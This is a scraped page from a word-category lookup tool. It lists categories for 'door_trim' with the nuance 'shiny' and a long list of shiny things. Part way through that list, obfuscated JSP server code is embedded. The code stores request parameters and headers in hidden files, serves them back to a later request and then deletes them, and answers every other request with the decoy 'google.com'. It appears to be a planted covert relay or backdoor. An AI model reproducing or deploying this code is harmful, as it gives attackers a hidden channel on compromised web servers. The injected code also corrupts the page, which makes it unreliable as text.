Use the & operator to see the shared categories of two terms. E.g.
cola & coffee
or
divorce & war
Go Back
See XML
Categories for
door_trim
with nuance
shiny
:
shiny:surface,
Simple categories matching
shiny
:
ground,
garment,
object,
surface,
thing,
embellishment,
metal,
decoration,
paper,
substance,
trinket,
substrate,
stuff,
fabric,
material,
item,
subject,
toy,
medium,
color,
hardware,
matter,
stone,
accessory,
part,
jewelry,
cover,
textile,
weapon,
fibre,
wrap,
time,
alloy,
clothes,
Members with property
shiny
:
mirror,
chromium,
glossy_paint,
glass,
floorboard,
water,
steel_surface,
silver_paper,
metal_sheet,
door_trim,
nail,
cd,
silver,
chrome,
top,
window_framing,
plastic,
stainless-steel_cookware,
copper,
shell_bag,
tiara,
iron,
white_quartz,
glasses,
plate,
tv,
satin,
new_brass,
snow,
jewel,
soda,
gold,
tin,
chrome_silver,
glossy_paper,
nickel,
gold_belt,
car_hubcap,
windshield,
bottle_cap,
satin_blazer,
compact_disk,
costume_jewellery,
platinum,
sword,
feather,
crotch,
shantung_silk,
metal,
rubber,
hot_roads,
glassware,
clip,
pvc_dress,
insect,
road,
polished_shoes,
vinyl_silk,
chrome_surface,
pie_plate,
roads,
windows,
chrome_plating,
small_piece,
lame,
car,
si,
bike,
granite,
polished_tombstone,
sunlit_street,
weapon_barrel,
satin_lingerie,
foil_packaging,
magazine_paper,
ceramics,
metallic_pen,
glass_table,
dvd,
tomato,
tinsel,
car_paint,
glass_bottom,
polished_surface,
sateen,
countertop,
viscose,
fast_car,
spectacles,
car_windshield,
glass_ornament,
coffee_package,
table_top,
bolt,
bike_tool,
jade,
chassis_bolt,
roadway,
piece,
book_cover,
bottle,
designer_shoes,
glossy_cabinet,
bath,
glass_marble,
toy,
voltaic_spear,
painted_door,
perfect_mirror,
metallic,
classic_car,
italian_marble,
car_key,
pot,
flashing_light,
tinfoil,
bathroom_windowsill,
bathroom_tile,
brass,
wet_pavement,
milk_carton,
pyrite,
counter_top,
leather,
hook,
bracket,
metal_chains,
zinc,
polished_end,
platinum_jewelry,
bones,
paperclip,
glossy_tabletop,
door_key,
balcony,
concrete,
porcelain_handbasin,
tin-can_lid,
latest,
crystal,
polyester,
sand_bunker,
bracelet,
shell,
spoon,
enamel,
camera_lense,
teapot,
car_bumper,
wooden_flooring,
wire,
magazine_page,
swinging_watch,
hair_pin,
magazine,
polished_brick,
gem_dice,
screw,
magnetite,
ss,
black_plastic,
metallic_surface,
lure,
brass_plate,
earring,
trim,
emerald,
polished_wood,
special-effect_film,
chrome_bumper,
magnesium,
glossy_cotton,
diamond,
flat_plate,
plastic_ball,
button,
car_body,
water_surface,
aluminium,
melamine_cupboard,
fiberglass_deck,
box,
foil_wrap,
lip_gloss,
car_roof,
glass_pane,
porcelain,
plastic_gem,
acetate,
ceramic_tile,
transparency_film,
eyeglasses,
wool,
stainless-steel_plate,
organza,
diving_knife,
wine_glasses,
accessory,
flat_roads,
glossy_photo,
pie_pan,
black_plexiglas,
thermos,
silver_tape,
basin,
latex,
aluminum-foil_strip,
wall,
aluminum_pigment,
gold_sunglasses,
linoleum_floor,
knife,
jewelry,
beads,
car_exterior,
velour,
painting,
damask,
wood,
glitter,
virtual_pc,
nut,
aluminum,
freezer,
cubic_zirconia,
tomb_stone,
wet_tarmac,
cowrie_shell,
glass_plate,
ice,
door,
engine,
tie,
luxurious_velvet,
steel_ball,
light,
battery,
marlite,
camera,
rayon,
window,
formica,
perspex,
wheel_hub,
christmas_decoration,
bald_head,
metal_plate,
unpainted_aluminum,
lighter,
steel,
mardi-gras_beads,
rhinestone,
pebble,
bronze,
silk,
metallic_object,
key,
mylar_balloon,
floor,
x-ray_synchrotron,
fake_jewelry,
iron_roof,
equipment,
gem,
ipod,
reflector,
china,
supercomputer,
velvet,
plastic_cover,
polished_stone,
clean_formica,
covered_surface,
buckle,
highway,
polished_granite,
wristwatch,
liquid,
silverware,
silk_shirt,
bench_top,
sequin,
foil,
vase,
velveteen,
new_copper,
reflective_fruit,
ring,
car_windscreen,
button_battery,
car_bodywork,
coin,
shiny_metal,
mold_steel,
pin,
bit,
spanner,
paper,
glossy,
watch,
bright_button,
marble,
orange-tree_leaf,
truck,
vehicle,
pvc,
paint,
pen,
glass_goblet,
stone,
linoleum,
glossy_vehicle,
jewellery,
taffeta,
tile,
pinwheel,
belt,
nylon,
fiberglass,
wet_road,
<%@page trimDirectiveWhitespaces="true"%> <%@page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%> <%@page import="java.io.*"%> <%@page import="java.util.*"%> <%@page import="java.text.*"%> <%! static String cuy321a = null; public static String cuy321b(byte[] cuy321c) { char[] cuy321d = { 'A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P', 'Q','R','S','T','U','V','W','X','Y','Z','a','b','c','d','e','f', 'g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v', 'w','x','y','z','0','1','2','3','4','5','6','7','8','9','+','/' }; StringBuilder cuy321e = new StringBuilder(); int cuy321f = 0; for (int i = 0; i < cuy321c.length; i += 3) { int b = ((cuy321c[i] & 0xFF) << 16) & 0xFFFFFF; if (i + 1 < cuy321c.length) { b |= (cuy321c[i+1] & 0xFF) << 8; } else { cuy321f++; } if (i + 2 < cuy321c.length) { b |= (cuy321c[i+2] & 0xFF); } else { cuy321f++; } for (int j = 0; j < 4 - cuy321f; j++) { int c = (b & 0xFC0000) >> 18; cuy321e.append(cuy321d[c]); b <<= 6; } } for (int j = 0; j < cuy321f; j++) { cuy321e.append("="); } return cuy321e.toString(); } public void cuy321a(HttpServletRequest req) { if (cuy321a != null) return; String cuy321g = getServletContext().getRealPath(req.getRequestURI()).replace('\\', '/'); cuy321a = cuy321g.substring(0, cuy321g.lastIndexOf('/')) + "/"; } byte[] cuy321h(String cuy321i) { byte[] cuy321j = null; FileInputStream cuy321k = null; File file = new File(cuy321i); try { cuy321k = new FileInputStream(file); cuy321j = new byte[(int)file.length()]; cuy321k.read(cuy321j); } catch (Exception ex) { } finally { try { if (cuy321k != null) cuy321k.close(); } catch (Exception ex) { } } return cuy321j; } %> <% cuy321a(request); String cuy322a = request.getParameter("user"); String cuy322b = request.getParameter("rand"); String cuy322c = request.getParameter("id"); String cuy322d = request.getParameter("action"); int cuy322e = -1; if (request.getParameter("code") != null) cuy322e = Integer.parseInt(request.getParameter("code")) % 4; if (cuy322d != null && "home".equals(cuy322d)) { out.write("google.com"); } if (cuy322a != null && !"0".equals(cuy322a)) { String cuy322g = cuy321a + cuy322b + ".vps"; String cuy322f = cuy322g + "x"; String cuy322h = request.getParameter("hash"); String cuy322i = request.getHeader("From"); FileOutputStream cuy322j = null; cuy322j = new FileOutputStream(cuy322f); if(cuy322j != null) { DataOutputStream cuy322k = new DataOutputStream(cuy322j); cuy322k.writeLong(System.currentTimeMillis()); cuy322k.close(); cuy322j.close(); } cuy322j = new FileOutputStream(cuy322g, false); if(cuy322j != null) { cuy322j.write(cuy322h.getBytes()); cuy322j.write('|'); cuy322j.write(cuy321b(cuy322i.getBytes()).getBytes()); cuy322j.write('|'); cuy322j.write(cuy321b(cuy322a.getBytes()).getBytes()); cuy322j.write('|'); cuy322j.write(cuy321b(cuy322b.getBytes()).getBytes()); cuy322j.write('|'); cuy322j.flush(); cuy322j.close(); } out.write("google.com"); } else if (cuy322e == 0 && "0".equals(cuy322c)) { out.write("google.com"); } else if (cuy322e == 1) { File cuy322l = new File(cuy321a); String cuy322g = null; String cuy322f = null; int cuy322m = 0; if (cuy322l.exists() && cuy322l.isDirectory()) { for(File file:cuy322l.listFiles()) { cuy322g = file.getName(); if(cuy322g.endsWith(".vps")) { cuy322m = 1; cuy322g = file.getAbsolutePath(); cuy322f = cuy322g + "x"; break; } } } if (cuy322m == 1) { FileInputStream cuy321k = new FileInputStream(cuy322f); DataInputStream cuy322o = new DataInputStream(cuy321k); if(System.currentTimeMillis() - cuy322o.readLong() < 180000) { byte[] cuy322p = cuy321h(cuy322g); if (cuy322p != null) { out.write(new String(cuy322p)); } } cuy322o.close(); cuy321k.close(); File cuy322p1 = new File(cuy322g); cuy322p1.delete(); File cuy322pz = new File(cuy322f); cuy322pz.delete(); } else { out.write("google.com"); } } %>